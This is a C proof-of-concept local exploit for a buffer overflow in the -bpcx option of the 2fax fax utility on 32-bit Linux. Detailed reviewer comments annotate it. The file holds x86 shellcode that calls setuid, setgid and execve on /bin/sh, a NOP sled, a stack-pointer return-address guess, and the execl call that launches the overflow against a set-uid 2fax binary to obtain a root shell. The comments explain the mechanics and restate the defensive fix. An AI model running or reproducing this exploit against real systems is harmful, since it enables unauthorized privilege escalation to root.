2fax -bpcx option local exploit for Linux.
ebae72f5d4e6a1ffe3acb022e81f8c0f51e05a3a4c47eaa2b903e3d2c92066ef
/*******************************************************************************
* *
* 2fax local PoC exploit *
* by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru] *
* *
* Bug: Buffer Overflow in -bpcx option *
* Homepage of 2fax: http://www.atbas.org/ *
* *
* Solution: Do not install the 2fax binary with the suid bit set *
* *
*******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#define MAX_SIZE 350 /* size of the payload buffer; main() fills 312 + 16 bytes of it */
#define OFFSET -1100 /* default amount subtracted from the stack pointer to guess ret */
/* Fixed, predictable path under /tmp that is passed to the target as its file
 * arguments.  NOTE(review): `tmpfile` is also the name of the stdio tmpfile()
 * function declared by the <stdio.h> included above; defining a standard
 * library name as a macro is strictly undefined behaviour under the C
 * reserved-identifier rules, even though it works in practice here. */
#define tmpfile "/tmp/abcde0987654"
/* shellcode for Linux x86 by Grange */
/*
 * Raw 32-bit x86 machine code, terminated by the string "/bin/sh".  The
 * \xcd\x80 pairs are `int 0x80` system-call entries; by inspection the
 * immediates 0x17, 0x2e and 0x0b are the i386 syscall numbers for setuid,
 * setgid and execve (confirm with a disassembler).  The byte string contains
 * no \x00, which is what lets main() move it around with strcat() and hand it
 * to execl() as an argv string: C string routines stop at the first NUL.
 * Note sizeof(shellcode) counts the implicit trailing NUL; main() uses
 * strlen() instead, which does not.
 */
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
/*
 * Returns the current stack pointer (32-bit x86 only).  There is no return
 * statement: the value reaches the caller only because `movl %esp,%eax`
 * leaves it in %eax, which happens to be the i386 return register.  That is
 * undefined behaviour in C and relies on the compiler neither reordering nor
 * discarding the asm; with optimisation, or on x86-64 where a 32-bit move
 * would not yield a usable address, the result is unreliable.
 */
long getesp() {
__asm__("movl %esp,%eax");
}
/*
 * Prints the banner and the invocation syntax to stdout.
 * argc is accepted for symmetry with main() but is not used.
 */
void usage(int argc, char **argv) {
    (void)argc;
    const char *banner =
        "Local exploit for 2fax program (<= v2.02)\n by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru]\n\n"
        "Usage: %s </path/to/2fax> [offset]\n\n";
    fprintf(stdout, banner, argv[0]);
}
/*
 * Entry point: builds the oversized "-bpcx:" argument and runs the target
 * binary with it.  Everything here is specific to 32-bit Linux (see getesp()
 * and the 4-byte placeholder stores below).  The defensive fix for the
 * underlying bug is the one the file header gives: never install 2fax set-uid.
 *
 * argv[1]  path to the 2fax binary (copied without a length check, below)
 * argv[2]  optional decimal stack-offset override; default is OFFSET
 * Returns 0 only if execl() fails; exit(-1) when the path argument is missing.
 */
int main(int argc,char **argv) {
/* faxpath and tmpexec are fixed-size; nothing below checks their bounds. */
char buf[MAX_SIZE], buf2[MAX_SIZE + 20], faxpath[100], *p, tmpexec[200];
int offset = OFFSET;
long ret;
if(argc<2) { usage(argc,argv); exit(-1); }
/* Unbounded copy of a command-line argument into a 100-byte buffer: the PoC
 * is itself overflowable by a long argv[1].  snprintf() would be the usual
 * fix. */
strcpy(faxpath,argv[1]);
/* Safe only because argv[argc] is NULL, so with argc == 2 argv[2] is NULL.
 * atoi() reports no parse errors; strtol() with endptr/errno would. */
if(argv[2]) offset=atoi(argv[2]);
bzero(buf,sizeof(buf));
bzero(buf2,sizeof(buf2));
/* Guessed return address: the current stack pointer minus the chosen offset. */
ret=getesp()-offset;
/* ret is a long but is printed with %x: mismatched format/argument types,
 * harmless on ILP32 but undefined in general. */
printf("ret: 0x%x, offset: %d\n",ret,offset);
/* Pad with 0x90 (x86 NOP) so that padding plus shellcode totals 312 bytes.
 * 312 presumably matches the target's buffer layout — not verifiable here. */
memset(buf,0x90,312-strlen(shellcode));
strcat(buf,shellcode);
/* Four 4-byte placeholders; each is overwritten with ret in the loop below. */
strcat(buf,"AAAAAAAAAAAAAAAA");
/* Unaligned store through a long*; assumes sizeof(long) == 4.  On LP64 each
 * store is 8 bytes and the placeholder layout no longer lines up. */
while( (p=(char *)strstr(buf,"AAAA")) != NULL ) *(long*)p=ret;
/* buf2 is MAX_SIZE + 20 bytes: "-bpcx:" (6) + 328 payload bytes + NUL fits. */
sprintf(buf2,"-bpcx:%s",buf);
/* The shell command is built only from the fixed tmpfile macro, never from
 * argv, so there is no injection here; a fixed, predictable name under /tmp
 * is still the classic symlink/race hazard, and the touch-then-rm pair
 * leaves nothing behind for the target to use. */
sprintf(tmpexec,"touch %s;rm -rf %s",tmpfile,tmpfile);
system(tmpexec);
/* Replaces this process on success.  On failure (bad path, not executable)
 * it falls through silently — no perror() — and returns 0, so a wrong path
 * is indistinguishable from a failed attempt. */
execl(faxpath,faxpath,buf2,tmpfile,tmpfile,NULL);
return 0;
}